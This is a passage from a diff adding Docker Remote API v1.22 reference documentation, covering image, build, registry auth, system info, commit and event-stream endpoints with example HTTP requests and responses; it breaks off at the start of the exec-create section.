+    - not a directory (**path** was asserted to be a directory but exists as a
+      file)
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** does not exist)
+- **500** - server error
+
+#### Extract an archive of files or folders to a directory in a container
+
+`PUT /containers/(id or name)/archive`
+
+Upload a tar archive to be extracted to a path in the filesystem of container
+`id`.
+
+**Query parameters**:
+
+- **path** - path to a directory in the container
+    to extract the archive's contents into. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The **path** resource must exist.
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error
+    if unpacking the given content would cause an existing directory to be
+    replaced with a non-directory and vice versa.
+
+**Example request**:
+
+    PUT /v1.22/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** – the content was extracted successfully
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** should be a directory but exists as a file)
+    - unable to overwrite existing directory with non-directory
+      (if **noOverwriteDirNonDir**)
+    - unable to overwrite existing non-directory with directory
+      (if **noOverwriteDirNonDir**)
+- **403** - client error, permission denied, the volume
+    or container rootfs is marked as read-only.
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** resource does not exist)
+- **500** – server error
+
+### 2.2 Images
+
+#### List Images
+
+`GET /images/json`
+
+**Example request**:
+
+    GET /v1.22/images/json?all=0 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+         "RepoTags": [
+           "ubuntu:12.04",
+           "ubuntu:precise",
+           "ubuntu:latest"
+         ],
+         "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c",
+         "Created": 1365714795,
+         "Size": 131506275,
+         "VirtualSize": 131506275,
+         "Labels": {}
+      },
+      {
+         "RepoTags": [
+           "ubuntu:12.10",
+           "ubuntu:quantal"
+         ],
+         "ParentId": "27cf784147099545",
+         "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+         "Created": 1364102658,
+         "Size": 24653,
+         "VirtualSize": 180116135,
+         "Labels": {
+            "com.example.version": "v1"
+         }
+      }
+    ]
+
+**Example request, with digest information**:
+
+    GET /v1.22/images/json?digests=1 HTTP/1.1
+
+**Example response, with digest information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "Created": 1420064636,
+        "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125",
+        "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2",
+        "RepoDigests": [
+          "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+        ],
+        "RepoTags": [
+          "localhost:5000/test/busybox:latest",
+          "playdate:latest"
+        ],
+        "Size": 0,
+        "VirtualSize": 2429728,
+        "Labels": {}
+      }
+    ]
+
+The response shows a single image `Id` associated with two repositories
+(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use
+either of the `RepoTags` values `localhost:5000/test/busybox:latest` or
+`playdate:latest` to reference the image.
+
+You can also use `RepoDigests` values to reference an image. In this response,
+the array has only one reference and that is to the
+`localhost:5000/test/busybox` repository; the `playdate` repository has no
+digest. You can reference this digest using the value:
+`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...`
+
+See the `docker run` and `docker build` commands for examples of digest and tag
+references on the command line.
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, default false
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `dangling=true`
+  -   `label=key` or `label="key=value"` of an image label
+-   **filter** - only return images with the specified name
+
+#### Build image from a Dockerfile
+
+`POST /build`
+
+Build an image from a Dockerfile
+
+**Example request**:
+
+    POST /v1.22/build HTTP/1.1
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"stream": "Step 1/5..."}
+    {"stream": "..."}
+    {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}}
+
+The input stream must be a `tar` archive compressed with one of the
+following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`.
+
+The archive must include a build instructions file, typically called
+`Dockerfile` at the archive's root. The `dockerfile` parameter may be
+used to specify a different build instructions file. To do this, its value must be
+the path to the alternate build instructions file to use.
+
+The archive may include any number of other files,
+which are accessible in the build context (See the [*ADD build
+command*](../reference/builder.md#add)).
+
+The Docker daemon performs a preliminary validation of the `Dockerfile` before
+starting the build, and returns an error if the syntax is incorrect. After that,
+each instruction is run one-by-one until the ID of the new image is output.
+
+The build is canceled if the client drops the connection by quitting
+or being killed.
+
+**Query parameters**:
+
+-   **dockerfile** - Path within the build context to the `Dockerfile`. This is
+        ignored if `remote` is specified and points to an external `Dockerfile`.
+-   **t** – A name and optional tag to apply to the image in the `name:tag` format.
+        If you omit the `tag` the default `latest` value is assumed.
+        You can provide one or more `t` parameters.
+-   **remote** – A Git repository URI or HTTP/HTTPS context URI. If the
+        URI points to a single text file, the file's contents are placed into
+        a file called `Dockerfile` and the image is built from that file. If
+        the URI points to a tarball, the file is downloaded by the daemon and
+        the contents therein used as the context for the build. If the URI
+        points to a tarball and the `dockerfile` parameter is also specified,
+        there must be a file with the corresponding path inside the tarball.
+-   **q** – Suppress verbose build output.
+-   **nocache** – Do not use the cache when building the image.
+-   **pull** - Attempt to pull the image even if an older image exists locally.
+-   **rm** - Remove intermediate containers after a successful build (default behavior).
+-   **forcerm** - Always remove intermediate containers (includes `rm`).
+-   **memory** - Set memory limit for build.
+-   **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap.
+-   **cpushares** - CPU shares (relative weight).
+-   **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`).
+-   **cpuperiod** - The length of a CPU period in microseconds.
+-   **cpuquota** - Microseconds of CPU time that the container can get in a CPU period.
+-   **buildargs** – JSON map of string pairs for build-time variables. Users pass
+        these values at build-time. Docker uses the `buildargs` as the environment
+        context for command(s) run via the Dockerfile's `RUN` instruction or for
+        variable expansion in other Dockerfile instructions. This is not meant for
+        passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg)
+-   **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0.  If omitted the system uses 64MB.
+
+**Request Headers**:
+
+-   **Content-type** – Set to `"application/tar"`.
+-   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
+        object with the following structure:
+
+            {
+                "docker.example.com": {
+                    "username": "janedoe",
+                    "password": "hunter2"
+                },
+                "https://index.docker.io/v1/": {
+                    "username": "mobydock",
+                    "password": "conta1n3rize14"
+                }
+            }
+
+    This object maps the hostname of a registry to an object containing the
+    "username" and "password" for that registry. Multiple registries may
+    be specified as the build may be based on an image requiring
+    authentication to pull from any arbitrary registry. Only the registry
+    domain name (and port if not the default "443") are required. However
+    (for legacy reasons) the "official" Docker, Inc. hosted registry must
+    be specified with both a "https://" prefix and a "/v1/" suffix even
+    though Docker will prefer to use the v2 registry API.
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Create an image
+
+`POST /images/create`
+
+Create an image either by pulling it from the registry or by importing it
+
+**Example request**:
+
+    POST /v1.22/images/create?fromImage=busybox&tag=latest HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pulling..."}
+    {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}}
+    {"error": "Invalid..."}
+    ...
+
+When using this endpoint to pull an image from the registry, the
+`X-Registry-Auth` header can be used to include
+a base64-encoded AuthConfig object.
+
+**Query parameters**:
+
+-   **fromImage** – Name of the image to pull. The name may include a tag or
+        digest. This parameter may only be used when pulling an image.
+        The pull is cancelled if the HTTP connection is closed.
+-   **fromSrc** – Source to import.  The value may be a URL from which the image
+        can be retrieved or `-` to read the image from the request body.
+        This parameter may only be used when importing an image.
+-   **repo** – Repository name given to an image when it is imported.
+        The repo may include a tag. This parameter may only be used when importing
+        an image.
+-   **tag** – Tag or digest. If empty when pulling an image, this causes all tags
+        for the given image to be pulled.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token
+    - Credential based login:
+
+        ```
+    {
+            "username": "jdoe",
+            "password": "secret",
+            "email": "jdoe@acme.com"
+    }
+        ```
+
+    - Token based login:
+
+        ```
+    {
+            "registrytoken": "9cbaf023786cd7..."
+    }
+        ```
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** - repository does not exist or no read access
+-   **500** – server error
+
+
+
+#### Inspect an image
+
+`GET /images/(name)/json`
+
+Return low-level information on the image `name`
+
+**Example request**:
+
+    GET /v1.22/images/example/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Id" : "85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c",
+       "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a",
+       "Comment" : "",
+       "Os" : "linux",
+       "Architecture" : "amd64",
+       "Parent" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+       "ContainerConfig" : {
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "User" : "",
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "Labels" : {
+             "com.example.license" : "GPL",
+             "com.example.version" : "1.0",
+             "com.example.vendor" : "Acme"
+          },
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "ExposedPorts" : null,
+          "Cmd" : [
+             "/bin/sh",
+             "-c",
+             "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0"
+          ]
+       },
+       "DockerVersion" : "1.9.0-dev",
+       "VirtualSize" : 188359297,
+       "Size" : 0,
+       "Author" : "",
+       "Created" : "2015-09-10T08:30:53.26995814Z",
+       "GraphDriver" : {
+          "Name" : "aufs",
+          "Data" : null
+       },
+       "RepoDigests" : [
+          "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+       ],
+       "RepoTags" : [
+          "example:1.0",
+          "example:latest",
+          "example:stable"
+       ],
+       "Config" : {
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "StdinOnce" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Cmd" : [
+             "/bin/bash"
+          ],
+          "ExposedPorts" : null,
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "Labels" : {
+             "com.example.vendor" : "Acme",
+             "com.example.version" : "1.0",
+             "com.example.license" : "GPL"
+          },
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "WorkingDir" : "",
+          "User" : ""
+       }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Get the history of an image
+
+`GET /images/(name)/history`
+
+Return the history of the image `name`
+
+**Example request**:
+
+    GET /v1.22/images/ubuntu/history HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+        {
+            "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710",
+            "Created": 1398108230,
+            "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /",
+            "Tags": [
+                "ubuntu:lucid",
+                "ubuntu:10.04"
+            ],
+            "Size": 182964289,
+            "Comment": ""
+        },
+        {
+            "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8",
+            "Created": 1398108222,
+            "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/",
+            "Tags": null,
+            "Size": 0,
+            "Comment": ""
+        },
+        {
+            "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158",
+            "Created": 1371157430,
+            "CreatedBy": "",
+            "Tags": [
+                "scratch12:latest",
+                "scratch:latest"
+            ],
+            "Size": 0,
+            "Comment": "Imported from -"
+        }
+    ]
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.22/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`.  This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+The push is cancelled if the HTTP connection is closed.
+
+**Example request**:
+
+    POST /v1.22/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+-   **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token
+    - Credential based login:
+
+        ```
+    {
+            "username": "jdoe",
+            "password": "secret",
+            "email": "jdoe@acme.com",
+    }
+        ```
+
+    - Token based login:
+
+        ```
+    {
+            "registrytoken": "9cbaf023786cd7..."
+    }
+        ```
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.22/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+-   **repo** – The repository to tag in
+-   **force** – 1/True/true or 0/False/false, default false
+-   **tag** - The new tag name
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.22/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+-   **force** – 1/True/true or 0/False/false, default false
+-   **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com).
+
+> **Note**:
+> The response keys have changed from API v1.6 to reflect the JSON
+> sent by the registry server to the docker daemon's request.
+
+**Example request**:
+
+    GET /v1.22/images/search?term=sshd HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "wma55/u1210sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "jdswinbank/sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "vgauthier/sshd",
+                "star_count": 0
+            }
+    ...
+    ]
+
+**Query parameters**:
+
+-   **term** – term to search
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+### 2.3 Misc
+
+#### Check auth configuration
+
+`POST /auth`
+
+Get the default username and email
+
+**Example request**:
+
+    POST /v1.22/auth HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "username": "hannibal",
+         "password": "xxxx",
+         "email": "hannibal@a-team.com",
+         "serveraddress": "https://index.docker.io/v1/"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **204** – no error
+-   **500** – server error
+
+#### Display system-wide information
+
+`GET /info`
+
+Display system-wide information
+
+**Example request**:
+
+    GET /v1.22/info HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+        "Architecture": "x86_64",
+        "ClusterStore": "etcd://localhost:2379",
+        "Containers": 11,
+        "ContainersRunning": 7,
+        "ContainersStopped": 3,
+        "ContainersPaused": 1,
+        "CpuCfsPeriod": true,
+        "CpuCfsQuota": true,
+        "Debug": false,
+        "DockerRootDir": "/var/lib/docker",
+        "Driver": "btrfs",
+        "DriverStatus": [[""]],
+        "ExecutionDriver": "native-0.1",
+        "ExperimentalBuild": false,
+        "HttpProxy": "http://test:test@localhost:8080",
+        "HttpsProxy": "https://test:test@localhost:8080",
+        "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS",
+        "IPv4Forwarding": true,
+        "Images": 16,
+        "IndexServerAddress": "https://index.docker.io/v1/",
+        "InitPath": "/usr/bin/docker",
+        "InitSha1": "",
+        "KernelVersion": "3.12.0-1-amd64",
+        "Labels": [
+            "storage=ssd"
+        ],
+        "MemTotal": 2099236864,
+        "MemoryLimit": true,
+        "NCPU": 1,
+        "NEventsListener": 0,
+        "NFd": 11,
+        "NGoroutines": 21,
+        "Name": "prod-server-42",
+        "NoProxy": "9.81.1.160",
+        "OomKillDisable": true,
+        "OSType": "linux",
+        "OperatingSystem": "Boot2Docker",
+        "Plugins": {
+            "Volume": [
+                "local"
+            ],
+            "Network": [
+                "null",
+                "host",
+                "bridge"
+            ]
+        },
+        "RegistryConfig": {
+            "IndexConfigs": {
+                "docker.io": {
+                    "Mirrors": null,
+                    "Name": "docker.io",
+                    "Official": true,
+                    "Secure": true
+                }
+            },
+            "InsecureRegistryCIDRs": [
+                "127.0.0.0/8"
+            ]
+        },
+        "ServerVersion": "1.9.0",
+        "SwapLimit": false,
+        "SystemStatus": [["State", "Healthy"]],
+        "SystemTime": "2015-03-10T11:11:23.730591467-07:00"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Show the docker version information
+
+`GET /version`
+
+Show the docker version information
+
+**Example request**:
+
+    GET /v1.22/version HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+         "Version": "1.10.0",
+         "Os": "linux",
+         "KernelVersion": "3.19.0-23-generic",
+         "GoVersion": "go1.4.2",
+         "GitCommit": "e75da4b",
+         "Arch": "amd64",
+         "ApiVersion": "1.22",
+         "BuildTime": "2015-12-01T07:09:13.444803460+00:00",
+         "Experimental": true
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Ping the docker server
+
+`GET /_ping`
+
+Ping the docker server
+
+**Example request**:
+
+    GET /v1.22/_ping HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a new image from a container's changes
+
+`POST /commit`
+
+Create a new image from a container's changes
+
+**Example request**:
+
+    POST /v1.22/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Hostname": "",
+         "Domainname": "",
+         "User": "",
+         "AttachStdin": false,
+         "AttachStdout": true,
+         "AttachStderr": true,
+         "Tty": false,
+         "OpenStdin": false,
+         "StdinOnce": false,
+         "Env": null,
+         "Cmd": [
+                 "date"
+         ],
+         "Mounts": [
+           {
+             "Source": "/data",
+             "Destination": "/data",
+             "Mode": "ro,Z",
+             "RW": false
+           }
+         ],
+         "Labels": {
+                 "key1": "value1",
+                 "key2": "value2"
+          },
+         "WorkingDir": "",
+         "NetworkDisabled": false,
+         "ExposedPorts": {
+                 "22/tcp": {}
+         }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {"Id": "596069db4bf5"}
+
+**JSON parameters**:
+
+-  **config** - the container's configuration
+
+**Query parameters**:
+
+-   **container** – source container
+-   **repo** – repository
+-   **tag** – tag
+-   **comment** – commit message
+-   **author** – author (e.g., "John Hannibal Smith
+    <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>")
+-   **pause** – 1/True/true or 0/False/false, whether to pause the container before committing
+-   **changes** – Dockerfile instructions to apply while committing
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Monitor Docker's events
+
+`GET /events`
+
+Get container events from docker, in real time via streaming.
+
+Docker containers report the following events:
+
+    attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
+
+Docker images report the following events:
+
+    delete, import, pull, push, tag, untag
+
+Docker volumes report the following events:
+
+    create, mount, unmount, destroy
+
+Docker networks report the following events:
+
+    create, connect, disconnect, destroy
+
+**Example request**:
+
+    GET /v1.22/events?since=1374067924
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+    Server: Docker/1.10.0 (linux)
+    Date: Fri, 29 Apr 2016 15:18:06 GMT
+    Transfer-Encoding: chunked
+
+    {
+      "status": "pull",
+      "id": "alpine:latest",
+      "Type": "image",
+      "Action": "pull",
+      "Actor": {
+        "ID": "alpine:latest",
+        "Attributes": {
+          "name": "alpine"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101301854122
+    }
+    {
+      "status": "create",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "create",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101381709551
+    }
+    {
+      "status": "attach",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "attach",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101383858412
+    }
+    {
+      "Type": "network",
+      "Action": "connect",
+      "Actor": {
+        "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474",
+        "Attributes": {
+          "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+          "name": "bridge",
+          "type": "bridge"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101394865557
+    }
+    {
+      "status": "start",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "start",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101607533796
+    }
+    {
+      "status": "resize",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "resize",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "height": "46",
+          "image": "alpine",
+          "name": "my-container",
+          "width": "204"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101610269268
+    }
+    {
+      "status": "die",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "die",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "exitCode": "0",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105079144137
+    }
+    {
+      "Type": "network",
+      "Action": "disconnect",
+      "Actor": {
+        "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474",
+        "Attributes": {
+          "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+          "name": "bridge",
+          "type": "bridge"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105230860245
+    }
+    {
+      "status": "destroy",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "destroy",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105338056026
+    }
+
+**Query parameters**:
+
+-   **since** – Timestamp. Show all events created since timestamp and then stream
+-   **until** – Timestamp. Show events created until given timestamp and stop streaming
+-   **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters:
+  -   `container=<string>`; -- container to filter
+  -   `event=<string>`; -- event to filter
+  -   `image=<string>`; -- image to filter
+  -   `label=<string>`; -- image and container label to filter
+  -   `type=<string>`; -- either `container` or `image` or `volume` or `network`
+  -   `volume=<string>`; -- volume to filter
+  -   `network=<string>`; -- network to filter
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images in a repository
+
+`GET /images/(name)/get`
+
+Get a tarball containing all images and metadata for the repository specified
+by `name`.
+
+If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image
+(and its parents) are returned. If `name` is an image ID, similarly only that
+image (and its parents) are returned, but with the exclusion of the
+'repositories' file in the tarball, as there were no image names referenced.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.22/images/ubuntu/get
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images
+
+`GET /images/get`
+
+Get a tarball containing all images and metadata for one or more repositories.
+
+For each value of the `names` parameter: if it is a specific name and tag (e.g.
+`ubuntu:latest`), then only that image (and its parents) are returned; if it is
+an image ID, similarly only that image (and its parents) are returned and there
+would be no names referenced in the 'repositories' file for this image ID.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.22/images/get?names=myname%2Fmyapp%3Alatest&names=busybox
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Load a tarball with a set of images and tags into docker
+
+`POST /images/load`
+
+Load a set of images and tags into a Docker repository.
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    POST /v1.22/images/load
+    Content-Type: application/x-tar
+
+    Tarball in body
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Image tarball format
+
+An image tarball contains one directory per image layer (named using its long ID),
+each containing these files:
+
+- `VERSION`: currently `1.0` - the file format version
+- `json`: detailed layer information, similar to `docker inspect layer_id`
+- `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories
+for storing attribute changes and deletions.
+
+If the tarball defines a repository, the tarball should also include a `repositories` file at
+the root that contains a list of repository and tag names mapped to layer IDs.
+
+```
+{"hello-world":
+    {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"}
+}
+```
+
+#### Exec Create
+
+`POST /containers/(id or name)/exec`
+
+Sets up an exec instance in a running container `id`
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/exec HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "AttachStdin": true,
+      "AttachStdout": true,
